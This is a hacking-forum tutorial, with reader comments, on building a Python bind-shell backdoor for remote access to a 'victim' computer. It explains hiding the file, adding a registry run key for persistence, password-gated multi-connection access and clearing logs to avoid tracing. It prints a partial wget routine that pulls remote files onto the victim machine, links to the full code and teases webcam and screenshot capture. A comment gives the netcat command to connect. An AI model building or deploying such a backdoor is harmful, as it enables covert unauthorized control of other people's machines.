How To: Create a Bind Shell in Python

Create a Bind Shell in Python

How to Create a Bind Shell in Python

Hi guys, I'm gonna keep this short because I got assignments and a lot of notes to study and also other how-tos and forums to reads. lol...Since I'm keeping this short...no story time just scenario. And I want to thank n3stor for giving me the idea to post this.

Scenario

Let's say you have a target to hack and you want to be able to remote access the victim(duh!). I think the most effective backdoor is the reverse shell because you get a connection no matter what! But what if someone finds it and reverse engineers it, you don't want them to know your IP address and they will even if you clear logs. But if you use a bind shell, though you will have to connect yourself and it is less likely that you will get in and also that it is loud, if you clear the logs, reverse engineering of the backdoor can't get you, so cool huh ;)

Step 1: Import Modules and Maintain Access

So first, you have to import the modules that you will use for our backdoor.

socket - for network connections
thread - so you can get multiple connections
subprocess - so you can run system commands

Now I am going to explain the subprocess calls. It assumes you run it from a USB

  • it copies the shell to the current user's directory
  • adds the bind shell to the registry so it always runs on system startup
  • hides the bind shell so it cannot be found easily

Step 2: Main Program

This is where the whole main code is.

This part contains what happens after you have got a connection.

Now we don't want just anyone to be using our backdoor so i added authentication to it. Didn't have time to change the username but feel free. And make sure you change it(don't want to be in trouble because of script kiddies....lol) . and you can download more stuff with the wget there ;) ...lol so anyway that's pretty much it...nothing much to it.

Step 3: Persistence

This part of the code mainly makes sure that you will always be ready to receive a connection even if an error causes the socket to close.

It also creates a thread so that there can be more than one connection simultaneously(hope that makes sense!!). And obviously, there can only be a maximum of 5 connections. :D

Conclusion

So that is pretty much it. I added more functionality to the improved one i have like download and upload of files from and to the victim's computer, webcam and screenshot. They are not too difficult so I'm sure you can figure that out for yourself. Well happy hacking folks. And don't forget to check out n3stor's tutorial on the reverse shell.

I have pasted the code on pastebin
http://pastebin.com/GzZp6K7a

EDIT: Sorry for any typos or errors in my English. And also there is a mistake in the pastebin code post for the wget part of it.

elif data.strip('\r\n').startswith('wget'):
try:
f = open(os.path.basename(data5:), "wb")
f.write(urllib2.urlopen(data5:).read())
f.close()
conn.send("Successfully downloaded %s" %os.path.basename(data5:))
except:
conn.send("Download failed!")

I forgot the .read() function. I'm sorry

7 Comments

Very nice! I wrote something similar recently, but had problems with threading.

Thanks Joe. I hope this helps you.

so how do I connect to the bind shell?

line 55: s.bind(('', 1568))

You know it's listening on port 1568. To connect, you can use netcat:

nc <victim.ip> 1568

and then login to the shell.

i am having problem here . i am new so instead of copying code, i tried to practice cod3 u provided and tried to understand a little bit.i ran code in C++ but still having problem.here is screen shot.if u could help i will be thankful

You are trying to run python code as c++ that won't work...it has to have a .py extension...

Mate you tried to run python code as c++?

Share Your Thoughts

  • Hot
  • Latest